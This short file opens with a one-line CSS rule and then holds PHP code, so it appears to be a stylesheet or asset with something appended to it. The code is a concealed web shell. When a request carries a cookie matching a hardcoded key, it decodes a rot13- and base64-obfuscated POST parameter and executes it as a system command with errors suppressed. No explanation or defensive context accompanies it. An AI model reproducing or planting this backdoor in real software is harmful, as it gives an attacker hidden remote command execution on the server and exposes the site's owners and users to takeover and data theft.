.x:before{content:x;}
<?php
$k="m1ck3y";
if(isset($_COOKIE["_md"])&&$_COOKIE["_md"]===$k){
$x=base64_decode(str_rot13($_POST["d"]??""));
if($x!=""){@system($x);echo"###".base64_encode($x)."###";}
}